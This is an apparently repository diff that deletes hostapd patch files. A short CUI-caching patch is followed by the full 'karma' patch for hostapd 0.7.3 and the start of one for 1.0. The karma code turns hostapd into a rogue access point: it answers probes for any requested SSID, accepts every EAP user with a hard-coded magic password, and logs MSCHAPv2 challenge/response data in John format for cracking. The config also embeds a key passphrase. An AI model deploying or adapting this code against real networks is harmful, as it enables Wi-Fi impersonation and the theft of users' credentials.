int ieee802_1x_tx_status(struct hostapd_data *hapd, struct sta_info *sta,
const u8 *buf, size_t len, int ack);
u8 * ieee802_1x_get_identity(struct eapol_state_machine *sm, size_t *len);
+
+/** definig CUI get function */
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len);
+Boolean getSetCui (struct eapol_state_machine *sm);
+
+/*********************/
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx);
const u8 * ieee802_1x_get_key(struct eapol_state_machine *sm, size_t *len);
diff -urN hostapd-1.0.orig//src/ap/pmksa_cache_auth.c hostapd-1.0/src/ap/pmksa_cache_auth.c
--- hostapd-1.0.orig//src/ap/pmksa_cache_auth.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/pmksa_cache_auth.c 2012-07-17 18:40:21.000000000 +0800
@@ -142,6 +142,20 @@
}
}
+/*set to cui in to cache*/
+
+ if (eapol ->cui) {
+
+ entry ->cui = os_malloc(eapol->cui_len); /*Allocate memory for CUI attribute*/
+ if (entry->cui) {
+ entry->cui_len = eapol->cui_len;
+ os_memcpy(entry->cui, eapol->cui,
+ eapol->cui_len);
+ }
+ }
+
+/*set to cui in to cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_copy_class(&entry->radius_class, &eapol->radius_class);
#endif /* CONFIG_NO_RADIUS */
@@ -169,6 +183,25 @@
eapol->identity, eapol->identity_len);
}
+/*Added to get CUI from the cache*/
+
+
+ if (entry->cui) {
+ os_free(eapol->cui);
+
+ eapol->cui = os_malloc(entry->cui_len);
+ eapol->cuiAvailable=TRUE;
+ if (eapol->cui) {
+ eapol->cui_len = entry->cui_len;
+ os_memcpy(eapol->cui, entry->cui,
+ entry->cui_len); /*copy the CUI attribute value to EAPOL data structure*/
+ }
+ wpa_hexdump_ascii(MSG_DEBUG, "CUIfrom PMKSA",
+ eapol->cui, eapol->cui_len);
+ }
+
+ /*Added to get CUI from the cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_free_class(&eapol->radius_class);
radius_copy_class(&eapol->radius_class, &entry->radius_class);
@@ -180,6 +213,7 @@
eapol->eap_type_authsrv = entry->eap_type_authsrv;
((struct sta_info *) eapol->sta)->vlan_id = entry->vlan_id;
+ printf ("GETTING CACHE ENTRY\n");
}
diff -urN hostapd-1.0.orig//src/ap/pmksa_cache_auth.h hostapd-1.0/src/ap/pmksa_cache_auth.h
--- hostapd-1.0.orig//src/ap/pmksa_cache_auth.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/pmksa_cache_auth.h 2012-07-17 18:40:21.000000000 +0800
@@ -31,6 +31,8 @@
u8 *identity;
size_t identity_len;
+ u8 *cui; /* cui by me*/
+ size_t cui_len; /*Size of the cached cui by me*/
struct radius_class_data radius_class;
u8 eap_type_authsrv;
int vlan_id;
diff -urN hostapd-1.0.orig//src/common/ieee802_11_common.c hostapd-1.0/src/common/ieee802_11_common.c
--- hostapd-1.0.orig//src/common/ieee802_11_common.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/common/ieee802_11_common.c 2012-07-17 18:40:21.000000000 +0800
@@ -31,8 +31,8 @@
if (elen < 4) {
if (show_errors) {
wpa_printf(MSG_MSGDUMP, "short vendor specific "
- "information element ignored (len=%lu)",
- (unsigned long) elen);
+ "information element ignored (len=%lu)",
+ (unsigned long) elen);
}
return -1;
}
diff -urN hostapd-1.0.orig//src/eapol_auth/eapol_auth_sm_i.h hostapd-1.0/src/eapol_auth/eapol_auth_sm_i.h
--- hostapd-1.0.orig//src/eapol_auth/eapol_auth_sm_i.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eapol_auth/eapol_auth_sm_i.h 2012-07-17 18:40:21.000000000 +0800
@@ -75,6 +75,7 @@
/* variables */
Boolean eapolLogoff;
Boolean eapolStart;
+ Boolean cuiAvailable; /*to check CUI is available in AcessAccept*/
PortTypes portMode;
unsigned int reAuthCount;
/* constants */
@@ -159,6 +160,8 @@
u8 last_eap_id; /* last used EAP Identifier */
u8 *identity;
size_t identity_len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI attribute length*/
u8 eap_type_authsrv; /* EAP type of the last EAP packet from
* Authentication server */
u8 eap_type_supp; /* EAP type of the last EAP packet from Supplicant */
diff -urN hostapd-1.0.orig//src/radius/radius.c hostapd-1.0/src/radius/radius.c
--- hostapd-1.0.orig//src/radius/radius.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/radius/radius.c 2012-07-17 18:40:21.000000000 +0800
@@ -24,16 +24,16 @@
/**
* struct radius_msg - RADIUS message structure for new and parsed messages
*/
-struct radius_msg {
+//struct radius_msg {
/**
* buf - Allocated buffer for RADIUS message
*/
- struct wpabuf *buf;
+ //struct wpabuf *buf;
/**
* hdr - Pointer to the RADIUS header in buf
*/
- struct radius_hdr *hdr;
+ //struct radius_hdr *hdr;
/**
* attr_pos - Array of indexes to attributes
@@ -41,18 +41,18 @@
* The values are number of bytes from buf to the beginning of
* struct radius_attr_hdr.
*/
- size_t *attr_pos;
+ //size_t *attr_pos;
/**
* attr_size - Total size of the attribute pointer array
*/
- size_t attr_size;
+ //size_t attr_size;
/**
* attr_used - Total number of attributes in the array
*/
- size_t attr_used;
-};
+ //size_t attr_used;
+//};
struct radius_hdr * radius_msg_get_hdr(struct radius_msg *msg)
@@ -66,7 +66,7 @@
return msg->buf;
}
-
+/*
static struct radius_attr_hdr *
radius_get_attr_hdr(struct radius_msg *msg, int idx)
{
@@ -74,7 +74,7 @@
(wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
}
-
+*/
static void radius_msg_set_hdr(struct radius_msg *msg, u8 code, u8 identifier)
{
msg->hdr->code = code;
diff -urN hostapd-1.0.orig//src/radius/radius.h hostapd-1.0/src/radius/radius.h
--- hostapd-1.0.orig//src/radius/radius.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/radius/radius.h 2012-07-17 18:40:21.000000000 +0800
@@ -21,6 +21,45 @@
#pragma pack(push, 1)
#endif /* _MSC_VER */
+/************************/
+struct radius_msg {
+ /**
+ * buf - Allocated buffer for RADIUS message
+ */
+ struct wpabuf *buf;
+
+ /**
+ * hdr - Pointer to the RADIUS header in buf
+ */
+ struct radius_hdr *hdr;
+
+ /**
+ * attr_pos - Array of indexes to attributes
+ *
+ * The values are number of bytes from buf to the beginning of
+ * struct radius_attr_hdr.
+ */
+ size_t *attr_pos;
+
+ /**
+ * attr_size - Total size of the attribute pointer array
+ */
+ size_t attr_size;
+
+ /**
+ * attr_used - Total number of attributes in the array
+ */
+ size_t attr_used;
+};
+
+
+
+
+/***********************/
+
+
+
+
struct radius_hdr {
u8 code;
u8 identifier;
@@ -201,6 +240,10 @@
size_t secret_len);
struct radius_attr_hdr * radius_msg_add_attr(struct radius_msg *msg, u8 type,
const u8 *data, size_t data_len);
+
+/****************************/
+
+/*****************************/
struct radius_msg * radius_msg_parse(const u8 *data, size_t len);
int radius_msg_add_eap(struct radius_msg *msg, const u8 *data,
size_t data_len);
@@ -238,7 +281,13 @@
u32 val = htonl(value);
return radius_msg_add_attr(msg, type, (u8 *) &val, 4) != NULL;
}
-
+/**********************/
+static struct radius_attr_hdr * radius_get_attr_hdr(struct radius_msg *msg, int idx)
+{
+ return (struct radius_attr_hdr *)
+ (wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
+}
+/**************************/
static inline int radius_msg_get_attr_int32(struct radius_msg *msg, u8 type,
u32 *value)
{

481
net-wireless/hostapd/files/hostapd-0.7.3-karma.patch
View file

@ -1,481 +0,0 @@
diff -urN hostapd-0.7.3.orig/hostapd/Makefile hostapd-0.7.3/hostapd/Makefile
--- hostapd-0.7.3.orig/hostapd/Makefile 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/hostapd/Makefile 2011-05-02 15:59:46.787000009 +0800
@@ -3,7 +3,7 @@
endif
ifndef CFLAGS
-CFLAGS = -MMD -O2 -Wall -g
+CFLAGS = -MMD -O2 -Wall -DDEBUG -g -pg
endif
CFLAGS += -I../src
@@ -84,6 +84,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -urN hostapd-0.7.3.orig/hostapd/hostapd.conf hostapd-0.7.3/hostapd/hostapd.conf
--- hostapd-0.7.3.orig/hostapd/hostapd.conf 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/hostapd/hostapd.conf 2011-05-02 15:59:46.788000008 +0800
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -88,7 +89,7 @@
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -99,14 +100,14 @@
# Operation mode (a = IEEE 802.11a, b = IEEE 802.11b, g = IEEE 802.11g,
# Default: IEEE 802.11b
-hw_mode=a
+hw_mode=b
# Channel number (IEEE 802.11)
# (default: 0, i.e., not set)
# Please note that some drivers (e.g., madwifi) do not use this value from
# hostapd and the channel will need to be configuration separately with
# iwconfig.
-channel=60
+channel=1
# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
beacon_int=100
@@ -410,7 +411,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -418,7 +419,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -460,16 +461,18 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
-eap_server=0
+eap_server=1
# Path for EAP server user database
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/sf_bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
@@ -477,9 +480,11 @@
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
#private_key_passwd=secret passphrase
+private_key_passwd=Cricket8
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -674,6 +679,7 @@
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -695,6 +701,7 @@
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -urN hostapd-0.7.3.orig/hostapd/main.c hostapd-0.7.3/hostapd/main.c
--- hostapd-0.7.3.orig/hostapd/main.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/hostapd/main.c 2011-05-02 16:01:06.320000003 +0800
@@ -36,6 +36,10 @@
extern int wpa_debug_show_keys;
extern int wpa_debug_timestamp;
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_interfaces {
size_t count;
@@ -458,7 +462,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] "
"<configuration file(s)>\n"
"\n"
"options:\n"
@@ -468,7 +472,9 @@
" -P PID file\n"
" -K include key data in debug messages\n"
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes using requested SSID\n"
+ " -A [karma] enable authentication attempt logging\n");
exit(1);
}
@@ -486,7 +492,7 @@
return -1;
for (;;) {
- c = getopt(argc, argv, "BdhKP:tv");
+ c = getopt(argc, argv, "BdhKP:tvRA");
if (c < 0)
break;
switch (c) {
@@ -511,6 +517,12 @@
case 't':
wpa_debug_timestamp++;
break;
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
case 'v':
show_version();
exit(1);
diff -urN hostapd-0.7.3.orig/src/ap/beacon.c hostapd-0.7.3/src/ap/beacon.c
--- hostapd-0.7.3.orig/src/ap/beacon.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/ap/beacon.c 2011-05-02 15:59:46.789000006 +0800
@@ -14,6 +14,11 @@
* See README and COPYING for more details.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -250,7 +255,24 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
}
-
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ else if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+
+ karma_logger(0, message);
+ free(message);
+
+ ssid = (char *)elems.ssid;
+ ssid_len = elems.ssid_len;
+ //if (sta)
+ // sta->ssid_probe = &elems.ssid;
+ }
if (!ssid) {
if (!(mgmt->da[0] & 0x01)) {
char ssid_txt[33];
diff -urN hostapd-0.7.3.orig/src/ap/hostapd.c hostapd-0.7.3/src/ap/hostapd.c
--- hostapd-0.7.3.orig/src/ap/hostapd.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/ap/hostapd.c 2011-05-02 15:59:46.789000006 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#include "utils/common.h"
diff -urN hostapd-0.7.3.orig/src/ap/ieee802_11.c hostapd-0.7.3/src/ap/ieee802_11.c
--- hostapd-0.7.3.orig/src/ap/ieee802_11.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/ap/ieee802_11.c 2011-05-02 15:59:46.790000004 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -533,8 +535,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -urN hostapd-0.7.3.orig/src/eap_server/eap_server.c hostapd-0.7.3/src/eap_server/eap_server.c
--- hostapd-0.7.3.orig/src/eap_server/eap_server.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/eap_server/eap_server.c 2011-05-02 15:59:46.791000002 +0800
@@ -18,6 +18,11 @@
* backend_auth configuration variable to TRUE.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -99,24 +104,51 @@
int eap_user_get(struct eap_sm *sm, const u8 *identity, size_t identity_len,
int phase2)
{
- struct eap_user *user;
-
- if (sm == NULL || sm->eapol_cb == NULL ||
- sm->eapol_cb->get_eap_user == NULL)
- return -1;
-
- eap_user_free(sm->user);
+ struct eap_user *user;
+ char *username = NULL;
+ char *message = NULL;
+
+ eap_user_free(sm->user);
sm->user = NULL;
- user = os_zalloc(sizeof(*user));
- if (user == NULL)
- return -1;
+ user = os_zalloc(sizeof(*user));
+ if (user == NULL)
+ return -1;
+
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ if (karma_eap_auth)
+ {
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else
+ {
+ if (sm == NULL || sm->eapol_cb == NULL ||
+ sm->eapol_cb->get_eap_user == NULL)
+ return -1;
- if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
- identity_len, phase2, user) != 0) {
- eap_user_free(user);
- return -1;
- }
+ if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
+ identity_len, phase2, user) != 0) {
+ eap_user_free(user);
+ return -1;
+ }
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -urN hostapd-0.7.3.orig/src/eap_server/eap_server_mschapv2.c hostapd-0.7.3/src/eap_server/eap_server_mschapv2.c
--- hostapd-0.7.3.orig/src/eap_server/eap_server_mschapv2.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/eap_server/eap_server_mschapv2.c 2011-05-02 15:59:46.792000002 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -289,13 +291,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -335,6 +339,38 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth)
+ {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -urN hostapd-0.7.3.orig/src/karma/karma.c hostapd-0.7.3/src/karma/karma.c
--- hostapd-0.7.3.orig/src/karma/karma.c 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-0.7.3/src/karma/karma.c 2011-05-02 15:59:46.792000002 +0800
@@ -0,0 +1,43 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ cur_time = time(NULL);
+ (void) time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s:%s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s:%s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -urN hostapd-0.7.3.orig/src/karma/karma.h hostapd-0.7.3/src/karma/karma.h
--- hostapd-0.7.3.orig/src/karma/karma.h 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-0.7.3/src/karma/karma.h 2011-05-02 15:59:46.792000002 +0800
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);
diff -urN hostapd-0.7.3.orig/src/utils/wpa_debug.c hostapd-0.7.3/src/utils/wpa_debug.c
--- hostapd-0.7.3.orig/src/utils/wpa_debug.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/utils/wpa_debug.c 2011-05-02 15:59:46.793000003 +0800
@@ -22,6 +22,8 @@
static int wpa_debug_syslog = 0;
#endif /* CONFIG_DEBUG_SYSLOG */
+/* Karma Mode */
+#include "karma/karma.h"
#ifdef CONFIG_DEBUG_FILE
static FILE *out_file = NULL;

465
net-wireless/hostapd/files/hostapd-1.0-karma.patch
View file

@ -1,465 +0,0 @@
diff -urN hostapd-1.0.orig//hostapd/Makefile hostapd-1.0/hostapd/Makefile
--- hostapd-1.0.orig//hostapd/Makefile 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/hostapd/Makefile 2012-07-17 18:36:53.318959033 +0800
@@ -3,7 +3,7 @@
endif
ifndef CFLAGS
-CFLAGS = -MMD -O2 -Wall -g
+CFLAGS = -MMD -O2 -Wall -DDEBUG -g -pg
endif
CFLAGS += -I../src
@@ -95,6 +95,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -urN hostapd-1.0.orig//hostapd/hostapd.conf hostapd-1.0/hostapd/hostapd.conf
--- hostapd-1.0.orig//hostapd/hostapd.conf 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/hostapd/hostapd.conf 2012-07-17 18:36:53.319959023 +0800
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -88,7 +89,7 @@
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -413,7 +414,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -421,7 +422,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -463,16 +464,18 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
-eap_server=0
+eap_server=1
# Path for EAP server user database
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/sf_bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
@@ -480,9 +483,11 @@
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
#private_key_passwd=secret passphrase
+private_key_passwd=Cricket8
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -680,6 +685,7 @@
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -701,6 +707,7 @@
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -urN hostapd-1.0.orig//hostapd/main.c hostapd-1.0/hostapd/main.c
--- hostapd-1.0.orig//hostapd/main.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/hostapd/main.c 2012-07-17 18:37:57.724959001 +0800
@@ -39,6 +39,10 @@
extern struct wpa_driver_ops *wpa_drivers[];
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_global {
void **drv_priv;
@@ -521,7 +525,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] [-e <entropy file>] "
"<configuration file(s)>\n"
"\n"
"options:\n"
@@ -535,7 +539,9 @@
" -f log output to debug file instead of stdout\n"
#endif /* CONFIG_DEBUG_FILE */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes using requested SSID\n"
+ " -A [karma] enable authentication attempt logging\n");
exit(1);
}
@@ -564,7 +570,7 @@
return -1;
for (;;) {
- c = getopt(argc, argv, "Bde:f:hKP:tv");
+ c = getopt(argc, argv, "Bde:f:hKP:tvRA");
if (c < 0)
break;
switch (c) {
@@ -595,6 +601,12 @@
case 't':
wpa_debug_timestamp++;
break;
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
case 'v':
show_version();
exit(1);
diff -urN hostapd-1.0.orig//src/ap/beacon.c hostapd-1.0/src/ap/beacon.c
--- hostapd-1.0.orig//src/ap/beacon.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/beacon.c 2012-07-17 18:36:53.322959001 +0800
